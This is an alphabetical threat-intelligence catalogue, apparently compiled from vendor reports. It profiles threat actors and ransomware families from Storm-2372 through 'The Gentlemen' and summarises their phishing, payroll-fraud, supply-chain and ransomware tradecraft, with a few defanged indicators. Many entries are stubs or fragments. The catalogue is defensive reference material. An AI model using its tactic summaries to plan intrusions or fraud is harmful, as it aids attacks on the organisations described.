Storm-2372 is a suspected nation-state actor aligned with Russian interests, engaging in device code phishing campaigns targeting governments, NGOs, and various industries across Europe, North America, Africa, and the Middle East. The actor employs tactics that involve impersonating prominent individuals through third-party messaging services like WhatsApp and Signal to gain rapport before sending phishing invitations. These invitations lure users into completing device code authentication requests, granting Storm-2372 initial access to victim accounts and enabling Graph API data collection activities, including email harvesting. Microsoft has observed the actor utilizing keyword searches within compromised accounts to exfiltrate sensitive information.

Storm-2460

Storm-2460 is a threat actor that has exploited elevation of privilege vulnerabilities to deploy PipeMagic malware and ransomware, enabling them to escalate access within compromised environments. They have been observed using the certutil utility to download malware from compromised legitimate third-party websites. Ransomware activity associated with Storm-2460 includes file encryption and the deployment of a ransom note named !_READ_ME_REXX2_!.txt. Microsoft recommends prioritizing security updates for elevation of privilege vulnerabilities to mitigate the impact of this actor's activities.

Storm-2470

Microsoft threat actor profile. Origin/Threat: China.

Storm-2603

The group Microsoft tracks as Storm-2603 is assessed with medium confidence to be a China-based threat actor. Microsoft has not identified links between Storm-2603 and other known Chinese threat actors. Microsoft tracks this threat actor in association with attempts to steal MachineKeys via the on-premises SharePoint vulnerabilities. Although Microsoft has observed this threat actor deploying Warlock and Lockbit ransomware in the past, Microsoft is currently unable to confidently assess the threat actor’s objectives. Additional actors may use these exploits to target unpatched on-premises SharePoint systems, further emphasizing the need for organizations to implement mitigations and security updates immediately.

Storm-2657

Storm-2657 is a financially motivated threat actor targeting US-based organizations, particularly in higher education, to compromise employee accounts and redirect salary payments to attacker-controlled accounts. They employ tactics such as creating inbox rules to delete warning notifications from HR platforms like Workday and using phishing emails that impersonate legitimate university communications to gain access. The actor modifies employee salary payment configurations to facilitate financial theft. Mitigation efforts include implementing phishing-resistant MFA methods to secure user identities against such attacks.

Storm-2755

Microsoft threat actor profile. Origin/Threat: Financially motivated.

Storm Cloud

Storm Cloud is a Chinese espionage threat actor known for targeting organizations across Asia, particularly Tibetan organizations and individuals. They use a variety of malware families, including GIMMICK and GOSLU, which are feature-rich and multi-platform. Storm Cloud leverages public cloud hosting services like Google Drive for command-and-control channels, making it difficult to detect their activities.

Storm

ransomware

Stormous

Stormous is an actor group known for stealing and selling data and extorting victims.[[redpiranha.net March 17 2025](/references/9399efb7-e91c-4acb-8b0f-6cde20592198)] The group announced support for the Russian government during its invasion of Ukraine and has conducted operations against Ukraine and its perceived allies, among a range of other targets.[[therecord.media April 26 2022](/references/6a67f91a-e2f7-4950-aa26-a63388be59c5)]

Strategic Services Agency (SSA)[28]

Strategic Services Agency (SSA)[28]

StrawHat

ransomware

Streamer

ransomware

Strictor

Ransomware. Based on EDA2; shows a Guy Fawkes mask.

Striked

ransomware

Stroman

ransomware

StucxTeam

Stucx is a threat actor known for targeting Israeli systems, including SCADA systems and the Red Alert missile protection system. Stucx Team has also developed a mobile application called MyOPECS for coordinating attacks, which includes features like DDoS attacks and is expected to add more capabilities in the future. Additionally, they have been observed using VPNs and proxy software to conceal their activities and have a history of making threats against those who cooperate with Israel.

Stupid

ransomware

StupidJapan

ransomware

Styver

ransomware

Styx

ransomware

Such_Crypt

ransomware

SuchSecurity Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The operator spreads the ransomware using email spam, fake updates, and malicious attachments. All of the victim's files are compromised, including music, MS Office and OpenOffice documents, pictures, videos, shared online files, etc.

Sugar

Sugar is an active extortion or ransomware group tracked by RansomLook.

SunCrypt

SunCrypt ransomware was discovered in October 2019, and in August 2020 it was added to the Maze ransomware cartel. It also follows some of Maze's tactics, techniques, and procedures. SunCrypt is launched and installed using an obfuscated PowerShell script. Infected email attachments (macros), torrent websites, and malicious ads act as carriers for this ransomware.

Sundawn

Sundawn is an active extortion or ransomware group tracked by RansomLook.

Sunglow Blizzard

DEV-0665 is a threat actor associated with the HermeticWiper attacks. Their objective is to disrupt, degrade, and destroy specific resources within a targeted country.

SuperB

ransomware

Superblack

Superblack is an active extortion or ransomware group tracked by RansomLook.

SuperCrypt

ransomware

SureRansom Ransomware (Fake)

It is directed at English-speaking users and is therefore able to strike worldwide. This ransomware does not actually encrypt files. The ransom requested is £50, payable by credit card.

Suri

ransomware

Surprise

Ransomware. Based on EDA2.

Survey

Ransomware. Still in development; shows a FileIce survey.

Swan Vector

Seqrite Labs APT-Team has recently uncovered a campaign, which we have termed Swan Vector, that has been targeting nations across the East China Sea such as Taiwan and Japan. The campaign is aimed at educational institutes and the mechanical engineering industry, with lures that deliver a fake candidate resume which acts as a decoy.

Swedish Security Service

Swedish Security Service – Säkerhetspolisen (Säpo)

SWEED

Cisco Talos recently identified a large number of ongoing malware distribution campaigns linked to a threat actor we're calling "SWEED," including such notable malware as Formbook, Lokibot and Agent Tesla. Based on our research, SWEED — which has been operating since at least 2017 — primarily targets their victims with stealers and remote access trojans. SWEED remains consistent across most of their campaigns in their use of spear-phishing emails with malicious attachments. While these campaigns have featured a myriad of different types of malicious documents, the actor primarily tries to infect its victims with a packed version of Agent Tesla — an information stealer that's been around since at least 2014. The version of Agent Tesla that SWEED is using differs slightly from what we've seen in the past in the way that it is packed, as well as how it infects the system. In this post, we'll run down each campaign we're able to connect to SWEED, and talk about some of the actor's tactics, techniques and procedures (TTPs).

SweetSpecter

SweetSpecter is a suspected Chinese espionage actor that has gained notoriety for using publicly available artificial intelligence capabilities to support its reconnaissance, research, and development efforts.[[OpenAI CTI Update October 2024](/references/81f40284-12e5-4835-8c14-19fb894e4822)]

Swiss intelligence agencies

Federal Intelligence Service - Nachrichtendienst des Bundes (NDB)

SYLHET GANG-SG

SYLHET GANG-SG is a hacktivist group that has targeted critical infrastructure and various entities, including the Central European University and the EU Parliament, often articulating their rationale for attacks. They have been involved in DDoS attacks against Western targets, including the personal website of UK Prime Minister Sunak and the Cyprus police. The group has also declared allegiance to the KillNet 2.0 hacker collective, focusing on threats against allies of Israel.

Symbiom

ransomware

SymmyWare

ransomware

SynAck

The ransomware does not use a customized desktop wallpaper to signal its presence, and the only way to discover that SynAck has infected a PC is by the ransom notes dropped on the user's desktop, named in the format RESTORE_INFO-[id].txt, for example RESTORE_INFO-4ABFA0EF.txt. In addition, SynAck appends its own extension to the end of every file it encrypts. This extension consists of ten random alphabetic characters, different for each file, for example test.jpg.XbMiJQiuoh. Experts believe the group behind SynAck uses RDP brute-force attacks to access remote computers and manually download and install the ransomware.

Synapse

Synapse is an active extortion or ransomware group tracked by RansomLook.

SyncCrypt

A new ransomware called SyncCrypt was discovered by Emsisoft security researcher xXToffeeXx that is being distributed by spam attachments containing WSF files. When installed these attachments will encrypt a computer and append the .kk extension to encrypted files.

SynoLocker

Ransomware. Exploited Synology NAS firmware directly over the WAN.

Syrk

ransomware

SYSDOWN

ransomware

SystemCrypter

ransomware

SZ40

ransomware

SZFLocker

Ransomware

T1Happy

ransomware

TA2101

Proofpoint researchers detected campaigns from a relatively new actor, tracked internally as TA2101, targeting German companies and organizations to deliver and install backdoor malware. The actor initiated their campaigns impersonating the Bundeszentralamt für Steuern, the German Federal Ministry of Finance, with lookalike domains, verbiage, and stolen branding in the emails. For their campaigns in Germany, the actor chose Cobalt Strike, a commercially licensed software tool that is generally used for penetration testing and emulates the type of backdoor framework used by Metasploit, a similar penetration testing tool. Proofpoint researchers have also observed this actor distributing Maze ransomware, employing similar social engineering techniques to those it uses for Cobalt Strike, while also targeting organizations in Italy and impersonating the Agenzia Delle Entrate, the Italian Revenue Agency. We have also recently observed the actor targeting organizations in the United States using the IcedID banking Trojan while impersonating the United States Postal Service (USPS).

TA2536

TA2536, which has been active since at least 2015, is likely Nigerian based on its unique linguistic style, tactics and tools. It uses keyloggers such as HawkEye and exhibits distinctive stylometric features, such as typo-squatted domains that resemble legitimate names and the recurring use of the same names and substrings in email addresses.

TA2552

Since January 2020, Proofpoint researchers have tracked an actor abusing Microsoft Office 365 (O365) third-party application (3PA) access, with suspected activity dating back to August 2019. The actor, known as TA2552, uses well-crafted Spanish language lures that leverage a narrow range of themes and brands. The lures entice users to click a link in the message, taking them to the legitimate Microsoft third-party apps consent page. There they are prompted to grant a third-party application read-only user permissions to their O365 account via OAuth2 or other token-based authorization methods. TA2552 seeks access to specific account resources like the user’s contacts and mail. Requesting read-only permissions for such account resources could be used to conduct account reconnaissance, silently steal data, or to intercept password reset messages from other accounts such as those at financial institutions. While organizations with global presence have received messages from this group, they appear to choose recipients who are likely Spanish speakers.

TA2719

In late March 2020, Proofpoint researchers began tracking a new actor with a penchant for using NanoCore and later AsyncRAT, popular commodity remote access trojans (RATs). Dubbed TA2719 by Proofpoint, the actor uses localized lures with colorful images that impersonate local banks, law enforcement, and shipping services. Proofpoint has observed this actor send low volume campaigns to recipients in Austria, Chile, Greece, Hungary, Italy, North Macedonia, Netherlands, Spain, Sweden, Taiwan, United States, and Uruguay.

TA2722

TA2722 is a highly active threat actor that targets various industries including Shipping/Logistics, Manufacturing, Business Services, Pharmaceutical, and Energy. They primarily focus on organizations in North America, Europe, and Southeast Asia. This threat actor impersonates Philippine government entities and uses themes related to the government to gain remote access to target computers. Their objectives include information gathering, installing follow-on malware, and engaging in business email compromise activities.

TA2723

TA2723 is a financially-motivated, high-volume credential phishing threat actor known for spoofing Microsoft OneDrive, LinkedIn, and DocuSign. Proofpoint Threat Research has observed TA2723 conducting OAuth device code phishing campaigns, utilizing tools like Squarephish and Graphish to enhance their operations. The use of these tools allows TA2723 to mitigate the short-lived nature of device codes, facilitating larger campaigns. Successful attacks can lead to M365 account takeover, data exfiltration, and lateral movement.

TA2725

TA2725 is a threat actor that has been tracked since March 2022. They primarily target organizations in Brazil and Mexico using Brazilian banking malware and phishing techniques. Recently, they have expanded their operations to also target victims in Spain and Mexico simultaneously. TA2725 typically uses GoDaddy virtual hosting for their URL redirector and hosts malicious files on legitimate cloud hosting providers like Amazon AWS, Google Cloud, or Microsoft Azure. They have been known to spoof legitimate companies, such as ÉSECÈ Group, to deceive their victims.

TA402

TA402 is an APT group that has been tracked by Proofpoint since 2020. They primarily target government entities in the Middle East and North Africa, with a focus on intelligence collection. TA402 is known for using sophisticated phishing campaigns and constantly updating their malware implants and delivery methods to evade detection. They have been observed using cloud services like Dropbox and Google Drive for hosting malicious payloads and command-and-control infrastructure.

TA406

TA406 engages in malware distribution, phishing, intelligence collection, and cryptocurrency theft, spanning a wide range of criminal activity.

TA410

Early in August 2019, Proofpoint described what appeared to be state-sponsored activity targeting the US utilities sector with malware that we dubbed “Lookback”. Between August 21 and August 29, 2019, several spear phishing emails were identified targeting additional US companies in the utilities sector. The phishing emails originated from what appears to be an actor-controlled domain: globalenergycertification[.]net. This domain, like those used in previous campaigns, impersonated a licensing body related to the utilities sector. In this case, it masqueraded as the legitimate domain for Global Energy Certification (“GEC”). The emails include a GEC examination-themed body and a malicious Microsoft Word attachment that uses macros to install and run LookBack. (Note confusion between Malware, Campaign and ThreatActor)

TA428

Proofpoint researchers have identified a targeted APT campaign that utilized malicious RTF documents to deliver custom malware to unsuspecting victims. We dubbed this campaign “Operation LagTime IT” based on entities that were targeted and the distinctive domains registered to C&C IP infrastructure. Beginning in early 2019, these threat actors targeted a number of government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes. We determined that the infection vector observed in this campaign was spear phishing, with emails originating from both free email accounts and compromised user accounts. Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT. Additionally, this APT group utilizes Poison Ivy payloads that share overlapping command and control (C&C) infrastructure with the newly identified Cotx campaigns. Based on infrastructure overlaps, post-exploitation techniques, and historic TTPs utilized in this operation, Proofpoint analysts attribute this activity to the Chinese APT group tracked internally as TA428. Researchers believe that this activity has an operational and tactical resemblance to the Maudi Surveillance Operation which was previously reported in 2013.

TA444

TA444 is a North Korea state-sponsored threat actor that primarily focuses on financially motivated operations. They have been active since at least 2017 and have recently shifted their attention to targeting cryptocurrencies. TA444 employs various infection methods and has a diverse range of malware and backdoors at their disposal. They have been attributed to stealing hundreds of millions of dollars' worth of cryptocurrency and related assets.

TA453

TA453 has employed the use of compromised accounts, malware, and confrontational lures to go after targets with a range of backgrounds from medical researchers to realtors to travel agencies.

TA455

TA455 is an Iranian APT group targeting the aerospace industry through a campaign known as the “Iranian Dream Job Campaign,” utilizing deceptive job offers to lure victims. They employ spearphishing tactics with malicious ZIP files containing the executable “secur32[.]dll” and disguise their C2 communications within the traffic of reputable services like Cloudflare and GitHub. The group intentionally mimics the TTPs of the North Korean Lazarus group to mislead investigators and complicate attribution. Their multi-stage infection strategy enhances the likelihood of success while evading detection.

TA482

Since early 2022, Proofpoint researchers have observed a prolific threat actor, tracked as TA482, regularly engaging in credential harvesting campaigns that target the social media accounts of mostly US-based journalists and media organizations. This victimology, TA482’s use of services originating from Turkey to host its domains and infrastructure, as well as Turkey’s history of leveraging social media to spread pro-President Recep Tayyip Erdogan and pro-Justice and Development Party (Turkey’s ruling party) propaganda support Proofpoint’s assessment that TA482 is aligned with the Turkish state.

TA4903

TA4903 is a financially motivated threat actor known for conducting credential phishing and business email compromise campaigns. They target organizations in the U.S. across various sectors, spoofing government entities and private businesses. The actor has been observed using techniques such as QR codes in phishing campaigns and spoofing supplier domains to prompt victims to provide banking information. TA4903's activities typically involve stealing corporate credentials to facilitate follow-on BEC activities.

TA499

TA499, also known as Vovan and Lexus, is a Russia-aligned threat actor that has aggressively engaged in email campaigns since at least 2021. The threat actor’s campaigns attempt to convince high-profile North American and European government officials as well as CEOs of prominent companies and celebrities into participating in recorded phone calls or video chats.

TA505

TA505, the name given by Proofpoint, has been in the cybercrime business for at least four years. This is the group behind the infamous Dridex banking trojan and Locky ransomware, delivered through malicious email campaigns via Necurs botnet. Other malware associated with TA505 include Philadelphia and GlobeImposter ransomware families.

TA516

This actor typically distributes instances of the SmokeLoader intermediate downloader, which, in turn, downloads additional malware of the actor’s choice -- often banking Trojans. Figure 3 shows a lure document from a November campaign in which TA516 distributed fake resumes with malicious macros that, if enabled, launch a PowerShell script that downloads SmokeLoader. In this instance, we observed SmokeLoader downloading a Monero coinminer. Since the middle of 2017, TA516 has used similar macro-laden documents as well as malicious JavaScript hosted on Google Drive to distribute both Panda Banker and a coinminer executable via SmokeLoader, often in the same campaigns.

TA530

TA530, who we previously examined in relation to large-scale personalized phishing campaigns

TA547

TA547 is responsible for many other campaigns since at least November 2017. The other campaigns by the actor were often localized to countries such as Australia, Germany, the United Kingdom, and Italy. Delivered malware included ZLoader (a.k.a. Terdot), Gootkit, Ursnif, Corebot, Panda Banker, Atmos, Mazar Bot, and Red Alert Android malware.

TA554

Since May 2018, Proofpoint researchers have observed email campaigns using a new downloader called sLoad. sLoad is a PowerShell downloader that most frequently delivers Ramnit banker and includes noteworthy reconnaissance features. The malware gathers information about the infected system including a list of running processes, the presence of Outlook, and the presence of Citrix-related files. sLoad can also take screenshots and check the DNS cache for specific domains (e.g., targeted banks), as well as load external binaries. While initial versions of sLoad appeared in May 2018, we began tracking the campaigns from this actor (internally named TA554) since at least the beginning of 2017.

TA555

Beginning in May 2018, Proofpoint researchers observed a previously undocumented downloader dubbed AdvisorsBot appearing in malicious email campaigns. The campaigns appear to primarily target hotels, restaurants, and telecommunications, and are distributed by an actor we track as TA555. To date, we have observed AdvisorsBot used as a first-stage payload, loading a fingerprinting module that, as with Marap, is presumably used to identify targets of interest to further infect with additional modules or payloads. AdvisorsBot is under active development and we have also observed another version of the malware completely rewritten in PowerShell and .NET.

TA558

Since 2018, security researchers have tracked a financially motivated cybercrime actor, TA558, targeting hospitality, travel, and related industries located in Latin America and, at times, North America and Western Europe. The actor sends malicious emails written in Portuguese, Spanish, and sometimes English. The emails use reservation-themed lures with business-relevant themes such as hotel room bookings. The emails may contain malicious attachments or URLs aiming to distribute one of at least 15 different malware payloads.

TA570

Proofpoint has tracked the large cybercrime threat actor TA570, one of the most active Qbot malware affiliates, since 2018.

TA571

TA571 is a spam distributor actor known for delivering a variety of malware, including DarkGate, NetSupport RAT, and information stealers. They use phishing emails with macro-enabled attachments to spread malicious PDFs containing rogue OneDrive links. TA571 has been observed using unique filtering techniques with intermediary "gates" to target specific users and bypass automated sandboxing. Proofpoint assesses with high confidence that TA571 infections can lead to ransomware.

TA575

TA575 is a Dridex affiliate tracked by Proofpoint since late 2020. This group distributes malware such as Dridex, Qakbot, and WastedLocker via malicious URLs, Office attachments, and password-protected files. On average, TA575 distributes almost 4,000 messages per campaign impacting hundreds of organizations.

TA579

TA579 is a threat actor that Proofpoint researchers have been tracking since August 2021. This actor frequently delivered BazaLoader and IcedID in past campaigns.

TA584

TA584 is a prominent initial access broker tracked by Proofpoint since November 2020, known for its high-volume campaigns targeting organizations globally. The actor employs various TTPs, including macro-enabled Excel documents, aggressive URL filtering, and geo-fenced landing pages, while frequently changing lures and delivery methods to evade detection. In 2025, TA584 expanded its geographic targeting to include Germany and Australia, while also introducing new malware such as Tsundere Bot alongside XWorm with the "P0WER" configuration. The actor's campaigns are characterized by rapid turnover and deliberate variability, making static indicators less effective for detection.

TA800

This attacker is an affiliate distributor of The Trick, also known as Trickbot, and BazaLoader. (For more on how affiliates work, see the description of TA573.) TA800 has targeted a wide range of industries in North America, infecting victims with banking Trojans and malware loaders (malware designed to download other malware onto a compromised device). Malicious emails have often included recipients' names, titles and employers along with phishing pages designed to look like the targeted company. Lures have included hard-to-resist subjects related to payment, meetings, termination, bonuses and complaints in the subject line or body of the email.

TA829

TA829 is a Russia-aligned threat actor that employs the RomCom RAT for intelligence-gathering and financially motivated cyberattacks, exploiting zero-day vulnerabilities in Mozilla Firefox and Microsoft Windows. The group utilizes REM Proxy services hosted on compromised MikroTik routers to relay traffic and disguise its origin. In their operations, victims targeted by TA829 receive a strain known as SlipScreen, while their infrastructure and tactics show significant similarities to those of UNK_GreenSec. TA829's hybrid approach combines espionage with financial fraud, making it a notable player in the cyber threat landscape.

TA866

According to Proofpoint, TA866 is a newly identified threat actor that distributes malware via email utilizing both commodity and custom tools. While most of the activity observed occurred since October 2022, Proofpoint researchers identified multiple activity clusters since 2019 that overlap with TA866 activity. Most of the activity recently observed by Proofpoint suggests recent campaigns are financially motivated; however, an assessment of historic related activities suggests a possible additional espionage objective.

TAG-112

TAG-112 is a Chinese state-sponsored APT that compromised Tibetan websites, including Tibet Post and Gyudmed Tantric University, to deliver Cobalt Strike malware. The group exploited vulnerabilities in the Joomla CMS to embed malicious JavaScript that spoofed a TLS certificate error, tricking users into downloading a compromised security certificate. TAG-112's infrastructure, concealed using Cloudflare, shows notable overlap with TAG-102, but it employs less sophisticated tactics, relying on Cobalt Strike rather than custom malware. The campaign reflects ongoing cyber-espionage efforts targeting Tibetan entities, likely for information collection and surveillance.

TAG-124

TAG-124 is a threat actor that employs a traffic distribution system to distribute malware, primarily using MintsLoader and targeting various sectors through phishing emails and compromised websites. The actor injects malicious JavaScript into WordPress sites, leading victims to fake Google Chrome update landing pages that facilitate malware downloads, often masquerading as legitimate updates. TAG-124 has been linked to multiple ransomware groups, including Rhysida and Interlock, and demonstrates high activity levels by regularly updating its infrastructure and refining its infection tactics, such as the ClickFix technique. Notable compromised sites include those associated with the Polish Centre for Testing and Certification and the Economic Community of West African States (ECOWAS).

TAG-140

TAG-140 is a threat actor group that primarily targets Indian government entities, employing cyber espionage tactics such as phishing and malware campaigns. They have deployed a new variant of the DRAT RAT, known as DRAT V2, which utilizes a ClickFix lure and executes a remote script via mshta.exe to establish persistence and facilitate data exfiltration. Their operations include the use of the BroaderAspect loader and a custom TCP-based C2 protocol, enabling a range of post-exploitation activities. TAG-140's activities reflect a pattern of iterative advancement in their malware arsenal and delivery techniques, complicating detection and attribution efforts.

TAG-28

TAG-28 is a Chinese state-sponsored threat actor that has been targeting Indian organizations, including media conglomerates and government agencies. They have been using the Winnti malware, which is commonly shared among Chinese state-sponsored groups. TAG-28's main objective is to gather intelligence on Indian targets, potentially for espionage purposes.

TAG-56

TAG-56 is a threat actor group that shares similarities with the APT42 group. They use tactics such as fake registration pages and spearphishing to target victims, often using encrypted chat platforms like WhatsApp or Telegram. TAG-56 is believed to be part of a broader campaign led by an Iran-nexus threat activity group. They have been observed using shared web hosts and recycled code, indicating a preference for acquiring purpose-built infrastructure rather than establishing their own.

Taidoor

The Taidoor attackers have been actively engaging in targeted attacks since at least March 4, 2009. Despite some exceptions, the Taidoor campaign often used Taiwanese IP addresses as C&C servers and email addresses to send out socially engineered emails with malware as attachments. One of the primary targets of the Taidoor campaign appeared to be the Taiwanese government. The attackers spoofed Taiwanese government email addresses to send out socially engineered emails in the Chinese language that typically leveraged Taiwan-themed issues. The attackers actively sent out malicious documents and maintained several IP addresses for command and control. As part of their social engineering ploy, the Taidoor attackers attach a decoy document to their emails that, when opened, displays the contents of a legitimate document but executes a malicious payload in the background. We were only able to gather a limited amount of information regarding the Taidoor attackers’ activities after they have compromised a target. We did, however, find that the Taidoor malware allowed attackers to operate an interactive shell on compromised computers and to upload and download files. In order to determine the operational capabilities of the attackers behind the Taidoor campaign, we monitored a compromised honeypot. The attackers issued some basic commands in an attempt to map out the extent of the network compromise but quickly realized that the honeypot was not an intended target and so promptly disabled the Taidoor malware running on it. This indicated that while Taidoor malware was more widely distributed compared with that tied to other targeted campaigns, the attackers could quickly assess their targets and distinguish these from inadvertently compromised computers and honeypots.

Takahiro Locker

ransomware

Tanzania Intelligence and Security Service

Tanzania Intelligence and Security Service (TISS)

Targetcompany

Targetcompany is an active extortion or ransomware group tracked by RansomLook.

Taronis

Taronis is an active extortion or ransomware group tracked by RansomLook.

TaskMasters

TaskMasters is a state-sponsored Chinese APT that has been active since at least 2010, primarily targeting industrial, energy, and government sectors in Russia and the CIS. The group has been linked to the Webdav-O Trojan, which employs techniques to bypass network defenses by connecting to legitimate services. Investigations suggest that TaskMasters may have been involved in attacks against Russian federal executive authorities in 2020, potentially alongside another Chinese group, TA428. Additionally, the group has been associated with the BackDoor.RemShell.24 malware, indicating a diverse toolkit in their operations.

TBHRanso

ransomware

Team Criminal Intelligence (FIOD-TCI)

Team Criminal Intelligence (FIOD-TCI)

Team Criminal Intelligence (KMar-TCI)

Team Criminal Intelligence (KMar-TCI)

Team Underground

Team Underground is an active extortion or ransomware group tracked by RansomLook.

Team-Xecuter

Team-Xecuter is a hacking group led by Gary Bowser, also known as GaryOPA. They were involved in a piracy conspiracy against Nintendo, creating and selling illegal circumvention devices that allowed users to hack video game consoles for playing pirated games. Gary Bowser has admitted his participation in this activity and is facing legal consequences.

Team46

Team46 is a sophisticated APT group active since at least late 2024, targeting Russian government, academic, and media organizations through spearphishing emails disguised as forum invitations or service notifications. They exploit zero-day vulnerabilities like CVE-2025-2783 in Google Chrome (March 2025, Operation ForumTroll) and CVE-2024-6473 in Yandex Browser, deploying multi-stage loaders (e.g., winsta.dll, donut shellcode) that decrypt payloads using machine-specific keys like firmware UUID for environmental guardrails. Key malware includes the Trinper backdoor for keylogging, clipboard theft, file/process discovery, and encrypted C2 exfiltration over HTTPS with domain fronting, alongside auxiliary .NET tools (dirlist.exe, ProcessList.exe) and variants using Cobalt Strike or Dante backdoor; the group employs obfuscation, AMSI bypasses, debugger evasion, and self-deletion for persistence and stealth. Positive Technologies attributes TaxOff operations to Team46 based on identical PowerShell patterns, loaders, and hyphenated CDN-mimicking infrastructure (e.g., ms-appdata-*.global.ssl.fastly.net).

Teamo

ransomware

TeamPCP

TeamPCP is a threat actor that has executed a coordinated series of supply chain attacks, compromising widely-used open source tools such as Trivy, KICS, and LiteLLM to deploy credential-stealing malware. They employed techniques like credential harvesting, lateral movement within Kubernetes environments, and audio steganography to evade detection. The group has demonstrated the ability to leverage stolen credentials to propagate attacks across multiple ecosystems, including npm and PyPI, using a self-propagating worm known as CanisterWorm. Their operations have included the use of AES-256 encryption and RSA-4096 for exfiltration of sensitive data.

TeamSpy Crew

Researchers have uncovered a long-term cyber-espionage campaign that used a combination of legitimate software packages and commodity malware tools to target a variety of heavy industry, government intelligence agencies and political activists. Known as the TeamSpy crew because of its affinity for using the legitimate TeamViewer application as part of its toolset, the attackers may have been active for as long as 10 years, researchers say. The attack appears to be a years-long espionage campaign, but experts who have analyzed the victim profile, malware components and command-and-control infrastructure say that it’s not entirely clear what kind of data the attackers are going after. What is clear, though, is that the attackers have been at this for a long time and that they have specific people in mind as targets. Researchers at the CrySyS Lab in Hungary were alerted by the Hungarian National Security Authority to an attack against a high-profile target in the country and began looking into the campaign. They quickly discovered that some of the infrastructure being used in the attack had been in use for some time and that the target they were investigating was by no means the only one.

TeamXRat

Ransomware

Teamxxx

Teamxxx is an active extortion or ransomware group tracked by RansomLook.

Tear Dr0p

ransomware

TechandStrat

ransomware

Technicy

ransomware

Teleboyi

Teleboyi is a threat actor reportedly based in China, associated with the PlugX RAT. TeamT5 identified a custom PlugX loader used by Teleboyi that employs a similar string decryption algorithm as seen in the McUtil.dll loader from Operation Harvest. While there are weak links to the dsqurey[.]com domain, the connection remains uncertain due to the domain's registration history.

Telecrypt Ransomware

This is most likely to affect Russian-speaking users, since the note is written in Russian. Therefore, residents of Russian-speaking countries are affected. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc. The ransomware’s authors would request around $75 from their victims to provide them with a decryptor (payments are accepted via the Russian payment services Qiwi or Yandex.Money). Right from the start, however, researchers suggested that TeleCrypt was written by cybercriminals without advanced skills. TeleCrypt generates a random string to encrypt with that is between 10 and 20 characters long and is built only from the letter pairs vo, pr, bm, xu, zt, dq.

Telegram

Telegram is an active extortion or ransomware group tracked by RansomLook.

Tellyouthepass

Tellyouthepass is a ransomware that alters system files and registry entries and encrypts personal photos, documents, and servers or archives. Army-grade encryption algorithms are used to change the original code of the file and render the data useless.

TEMP_Heretic

TEMP_Heretic is a threat actor that has been observed engaging in targeted spear-phishing campaigns. They exploit vulnerabilities in email platforms, such as Zimbra, to exfiltrate emails from government, military, and media organizations. They use multiple outlook.com email addresses and manually craft content for each email before sending it.

TEMP.Hermit

TEMP.Hermit is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

TEMPER PANDA

China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as PoisonIvy, as well as some non-public backdoors. This threat actor targets pro-democracy activists and organizations in Hong Kong, European and international financial institutions, and a U.S.-based think tank.

TempTick

This threat actor targets organizations in the finance, defense, aerospace, technology, health-care, and automotive sectors and media organizations in East Asia for the purpose of espionage. It is believed to be responsible for the targeting of South Korean actors prior to the meeting of Donald J. Trump and Kim Jong-un.

Tengu

Tengu is an active extortion or ransomware group tracked by RansomLook.

Terörle Mücadele Dairesi Başkanlığı (TEM)

Terörle Mücadele Dairesi Başkanlığı (TEM) (Anti-Terrorism Department)

TERBIUM

Microsoft Threat Intelligence identified similarities between this recent attack and previous 2012 attacks against tens of thousands of computers belonging to organizations in the energy sector. Microsoft Threat Intelligence refers to the activity group behind these attacks as TERBIUM, following our internal practice of assigning rogue actors chemical element names.

Termite Ransomware Operators

The Termite ransomware strain has been observed since April 2024. Researchers have noted considerable code and behavioral overlaps between the Babuk ransomware and Termite.[[Infosecurity Magazine December 9 2024](/references/1a3f22b7-8585-44b7-845a-eaa13d8a5dc1)] Actors using Termite have attacked organizations in various sectors and locations, publicly extorting some victims on a dark web "data leak" site since November 2024.[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)] News reports linked a series of attacks in late 2024, which exploited vulnerabilities in Cleo managed file transfer ("MFT") software, to Termite ransomware operators.[[DarkReading Termite Cleo December 10 2024](/references/e854ae37-3137-4cdd-a464-7e2328b1246e)]

Termite Ransomware

Ben Hunter discovered a new ransomware called Termite Ransomware. When encrypting a computer it will append the .aaaaaa extension to encrypted files.

Termite

Termite is an active extortion or ransomware group tracked by RansomLook.

Terrorelhárítási Központ

Terrorelhárítási Központ (TEK) (Counter Terrorism Centre)

Terrorist Investigation Division

Terrorist Investigation Division

TeslaCrypt 0.x - 2.2.0

Ransomware. Factorization.

TeslaCrypt 3.0+

Ransomware. Version 4.0+ adds no extension to encrypted files.

TeslaCrypt 4.1A

Ransomware

TeslaCrypt 4.2

Ransomware

TeslaWare

ransomware

TEST PANDA

TEST PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

TetrisPhantom

TetrisPhantom relies on compromising a certain type of secure USB drive that provides hardware encryption and is commonly used by government organizations. While investigating this threat, experts identified an entire spying campaign that uses a range of malicious modules to execute commands, collect files and information from compromised computers and transfer them to other machines, also using secure USB drives.

TFlower

ransomware

Thanatos

Ransomware; the first seen to ask for payment to be made in Bitcoin Cash (BCH).

Thanksgiving Ransomware

It is directed at English-speaking users and can therefore infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files etc.

Thanos

Thanos is an active extortion or ransomware group tracked by RansomLook.

The Big Bang

While it is not clear exactly what the attacker is looking for, what is clear is that once he finds it, a second stage of the attack awaits, fetching additional modules and/or malware from the Command and Control server. This then is a surveillance attack in progress and has been dubbed ‘Big Bang’ due to the attacker’s fondness for the ‘Big Bang Theory’ TV show, after which some of the malware’s modules are named.

The Brotherhood

ransomware

The Gentlemen

The Gentlemen is a ransomware group that employs a dual-extortion strategy, encrypting sensitive files while exfiltrating critical business data to pressure victims into paying ransoms. Their operations leverage advanced techniques such as abusing legitimate utilities like PowerRun.exe for privilege escalation, using custom-built tools for defense evasion, and employing flexible encryption methods based on file size. The group targets medium to large organizations across various sectors, particularly in the Asia-Pacific region, and has demonstrated a high level of technical maturity and operational discipline. Their activities include systematic compromise of enterprise environments, mass account enumeration, and the use of encrypted channels for data exfiltration.

